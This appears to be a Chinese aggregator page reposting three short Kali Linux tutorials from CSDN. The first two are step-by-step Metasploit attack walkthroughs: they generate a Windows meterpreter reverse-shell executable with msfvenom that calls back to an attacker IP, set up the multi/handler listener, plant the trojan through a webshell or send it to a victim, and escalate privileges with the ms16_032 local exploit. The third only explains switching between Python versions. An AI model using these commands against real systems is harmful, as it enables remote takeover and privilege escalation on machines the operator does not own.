kali

kali下msf提权

人盡茶涼 提交于 2019-11-26 09:22:22
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.184.132 Exploit 现在将1.exe 通过菜刀或者webshell 上次到可写目录,并且执行 这样就监听成功了 获得一个session (会话) Getuid 查看主机名 shell 进入命令行模式 当然这里也可以加载exp Exit 返回到meterpeter模式 Background 返回 multi/handler use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp Session 1 返回之前的会话 Exploit 进行提权 这说明exp执行成功,可以进一步提权,内网渗透了 来源: CSDN 作者: 沧海NO1 链接: https://blog.csdn.net/u010025272/article

Kali-利用metasploit中的exploit/multi/handler进行攻击

烈酒焚心 提交于 2019-11-26 09:20:49
在攻击服务器上生成连接软件,LHOST为攻击机IP地址 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe 打开msfconsole控制台 root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handler msfconsole (exploit/multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msfconsole (exploit/multi/handler) > set LHOST <IP> msfconsole (exploit/multi/handler) > set LPORT 443 msfconsole (exploit/multi/handler) > exploit 将软件发给客户机上运行,此时kali上会有连接提示 此时连接建立成功,输入shell测试 出现Windows命令行则说明攻击成功 如果提醒如下,输入shell显示meterpreter > shell [-] Unknown command: shell.,说明链接未建立成功 meterpreter > shell [-]

kali切换python2和python3的方法

喜欢而已 提交于 2019-11-26 06:27:38
打开终端分别输入下面两条命令: update-alternatives --install /usr/bin/python python /usr/bin/python2 100 update-alternatives --install /usr/bin/python python /usr/bin/python3 150 然后打开终端输入:python --version 如果没有错误的话,此时python版本应该切换到默认的python3了。 如果需要重新切换回python只需要在终端输入:update-alternatives --config python 然后选择你需要的python版本,输入序号回车就可以了 Linux系统都可以使用这方法 来源: https://blog.csdn.net/qq_33336310/article/details/98766897